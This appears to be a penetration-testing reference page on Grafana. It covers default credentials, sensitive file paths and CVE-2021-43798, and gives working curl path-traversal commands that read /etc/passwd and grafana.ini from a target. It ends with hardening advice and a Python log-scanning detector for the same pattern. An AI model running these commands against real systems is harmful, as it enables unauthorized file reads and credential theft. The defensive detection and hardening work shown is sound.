Grafana
Metrics dashboard on 3000. A path-traversal CVE reads arbitrary files unauthenticated, the SQLite DB stores the admin hash and datasource creds, and admin/admin is a common default.
Ports
| Port | Proto | Notes |
|---|---|---|
| 3000 | tcp | Grafana web UI |
Fingerprint
- Login page at /login, Grafana branding
- /api/health returns the version
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /etc/grafana/grafana.ini | admin password, secret_key, SMTP creds | sensitive |
| /var/lib/grafana/grafana.db | SQLite: admin hash and encrypted datasource creds | sensitive |
Default / weak creds
admin / admin default
Service users
grafana
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2021-43798 | Unauthenticated path traversal via plugin paths, arbitrary file read |
Exploitation primitives
- CVE-2021-43798 reads files like /etc/passwd and grafana.ini without auth
- Pull grafana.db for the admin hash and datasource credentials
- Default admin/admin; datasource configs can enable SSRF
Overview
Grafana on 3000 visualises metrics, and its 2021 path-traversal bug made it a popular unauthenticated file-read primitive. Even without it, the SQLite DB hands over the admin hash and stored datasource secrets.
File read (CVE-2021-43798)
Read /etc/passwd (CVE-2021-43798):
curl --path-as-is "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
Read the config (admin password, secret_key):
curl --path-as-is "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini"
Hardening
Patch the traversal CVE, change the default admin password, and protect grafana.db and the secret_key.
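Detection for the traversal pattern above, as an added example that is not part of the original page: it scans reverse-proxy access logs (constructed sample lines in combined log format, assumed to sit in front of Grafana on 3000) for /public/plugins/ requests whose decoded path contains a `..` segment, and reports the source IP and status so a responder can tell blocked probes from ones the instance actually served.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format) from a proxy in front of Grafana:3000.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.68.0"
10.0.0.5 - - [07/Dec/2021:10:01:03 +0000] "GET /public/plugins/alertlist/..%2F..%2F..%2F..%2Fetc/grafana/grafana.ini HTTP/1.1" 200 2210 "-" "curl/7.68.0"
10.0.0.9 - - [07/Dec/2021:10:02:00 +0000] "GET /public/plugins/alertlist/img/icn-singlestat-panel.svg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Dec/2021:10:02:01 +0000] "GET /api/health HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_plugin_traversal(path: str) -> bool:
    """True if the request targets /public/plugins/ and, after decoding, contains a '..' segment."""
    raw = path.split("?", 1)[0]            # ignore any query string
    decoded = unquote(unquote(raw))        # second pass catches double-encoded %252E%252E
    if not decoded.startswith("/public/plugins/"):
        return False
    # Normalise backslashes and check each path segment; a legitimate plugin asset never climbs.
    return any(seg == ".." for seg in decoded.replace("\\", "/").split("/"))


def find_traversal_attempts(log_text: str) -> list:
    """Return one record per suspicious request. A 200 status means the file was likely served,
    i.e. the instance is probably unpatched; 4xx usually means the proxy or Grafana rejected it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_plugin_traversal(m["path"]):
            hits.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"]),
                         "served": m["status"] == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```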